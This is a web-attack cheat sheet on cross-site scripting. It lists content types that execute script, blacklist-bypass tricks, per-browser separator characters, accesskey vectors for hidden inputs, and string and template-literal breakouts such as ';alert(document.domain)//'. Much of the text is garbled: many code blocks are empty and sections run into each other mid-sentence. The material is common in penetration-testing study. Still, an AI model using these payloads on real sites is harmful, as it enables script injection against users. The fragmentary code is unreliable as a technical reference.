# XSS (Cross Site Scripting) **Web Content-Types to XSS** The following content types can execute XSS in all browsers: * `text/html` * `application/xhtml+xml` * `application/xml` * `text/xml` * `image/svg+xml` * `text/plain` (?? not in the list but I think I saw this in a CTF) * `application/rss+xml` (off) * `application/atom+xml` (off) In other browsers other Content-Types can be used to execute arbitrary JS, check: https://github.com/BlackFan/content-type-research/blob/master/XSS.md **xml Content Type** If the page is returnin a text/xml content-type it's possible to indicate a namespace and execute arbitrary JS ```javascript hello ``` ----- **Injecting inside raw HTML** ```javascript ``` **Blacklist Bypasses** ```javascript //Random capitalization alert(1) //Not closing tag, ending with " <" or " //" //Special cases .//https://github.com/evilcos/xss.swf //https://github.com/evilcos/xss.swf //Encoded: // This WORKS //Encoded: alert(1) // This doesn't work ``` **Reverse tab nabbing** If you can inject any URL in an arbitrary //No safari //chars allowed between the onevent and the "=" IExplorer: %09 %0B %0C %020 %3B Chrome: %09 %20 %28 %2C %3B Safari: %2C %3B Firefox: %09 %20 %28 %2C %3B Opera: %09 %20 %2C %3B Android: %09 %20 %28 %2C %3B ``` **XSS in "Unexploitable tags" (hidden input, link, canonical, meta)** ```javascript
Newsletter popup
//You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector ``` **Inside JS code** If <> are being sanitised you can still escape the string where your input is being located and execute arbitrary JS. It's important to fix JS syntax, because if there are any errors, the JS code won't be executed ```javascript '-alert(document.domain)-' ';alert(document.domain)// \';alert(document.domain)// ``` **Template literals ``** In order to construct strings apart from single and double quotes JS also accepts backticks `` . This is known as template literals as they allow to embedded JS expressions using ${ ... } syntax. Therefore, if you find that your input is being reflected inside a JS string that is using backticks, you can abuse the syntax ${ ... } to execute arbitrary JS code ```javascript `${alert(1)}` `${`${`${`${alert(1)}`}`}`}` // This is valid JS code, because each time the function returns itself it's recalled with `` function loop(){return loop} loop`````````````` ``` **Encoded code execution** ```javascript "> ">